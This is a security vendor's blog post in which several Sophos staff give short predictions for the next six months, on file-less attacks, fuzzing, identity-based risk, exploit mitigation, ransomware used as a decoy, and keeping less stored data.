Predictions are always kind of difficult and you should handle them with care. At least the ones that see every glitch, failure and fumble as a sign of the impending digital Pearl Harbour. So we at Sophos decided to take another approach by taking the “tomorrow’s internet” part literally. We asked a number of people working in different technical roles at Sophos where they’re actually planning to spend some of their time and energy in the next six months. So here are our “from the trenches” predictions that reflect what people are actually preparing for. We’re preparing for them to come true, maybe you should too.
1. More file-less attacks, Principal Threat Researcher 2, Fraser Howard:
To date file-less attacks have been fairly isolated, but it seems to be growing in prominence (Poweliks, Angler for a bit, Kovter and more recently Powmet). This is a natural response to the widespread deployment of machine learning.
I also expect to see a rise in Powershell abuse.
2. Smarter fuzzing for everyone, Senior Security Analyst 2, Stephen Edwards:
I’m expecting the sophistication of fuzzing to improve significantly. Fuzzing can be used to automatically create billions of ‘stupid’ tests and the next challenge is to make those tests smarter, by informing the test creation process with knowledge about how a program works.
Automatic exploration of code is hard though.
Hybrid techniques try to balance the speed of stupid tests with the efficiency of smarter ones, while avoiding getting lost in too many choices.
A number of promising approaches to improving fuzzing have already been demonstrated and it feels to me that we’re almost at a breakthrough where those different techniques will be combined and made public.
Stephen provided such a long and detailed response to our question we published it as a full article too. It’s called Is security on the verge of a fuzzing breakthrough?
3. Ask who and what, not where, Cybersecurity Specialist, Mark Lanczak-Faulds:
Traditionally, security focuses on the domain as a whole. As we look to blur the boundaries of a traditional network and the internet, what matters are the identities and assets residing within the domain.
We need to determine risk based on identity and the assets associated with that identity. When you trigger an alert accounting for those factors, you know what’s at stake and can act proportionately and swiftly.
4. Focus on exploit mitigation, Sophos Security Specialist, Greg Iddon:
Patching is no longer something you can save until after change freeze or a rainy day.
I think that in the next six to twelve months, implementing exploit mitigation – protection against the abuse of known or unknown bugs and vulnerabilities, and the underlying way attackers take advantage of these bugs and vulnerabilities – is going to be key to staying ahead.
What concerns me most is that there is a swathe of new vendors who are only focussing on detection of Portable Executable (PE) files, touting machine learning as the be-all and end-all of endpoint security. This simply isn’t true.
Don’t get me wrong, machine learning is great, but it’s just a single layer in what must be a multi-layered approach to security
5. Ransomware repurposed, Global Escalation Support Engineer, Peter Mackenzie:
Based on some trends we’re seeing now I think we could see a shift in the way that ransomware is used.
Unlike most other malware, ransomware is noisy and scary – it doesn’t work unless you know you’ve got it, and it has to make you feel afraid. As security tools get better at dealing with ransomware, some attackers are using that noisyness as a technique for hiding something else, or as last resort after making money off you another way using, say, key loggers or cryptocurrency miners.
Once you’ve removed the noisy ransomware infection it’s easy to think you’ve cleaned your system. What you need to ask is “why did it detonate now?” and “what else was, or still is, running on the computer where we found the ransomware?”
6. Data is a liability, not an asset, Senior Cybersecurity Director, Ross McKerchar:
I expect to spend a lot of time in the next 6 months deleting unnecessary data and generally being very careful about what we store and where. It’s a defence in depth measure – the less you store the less you have to lose.
This applies across entire companies but, probably more importantly, on exposed assets such as web servers too. They should only have access to the minimum amount of data they need and nothing more. Why does a web server need to have access to someone’s SSN, for example? You may need it for other reasons, or your web server may need to collect an SSN once, but does it need to keep it?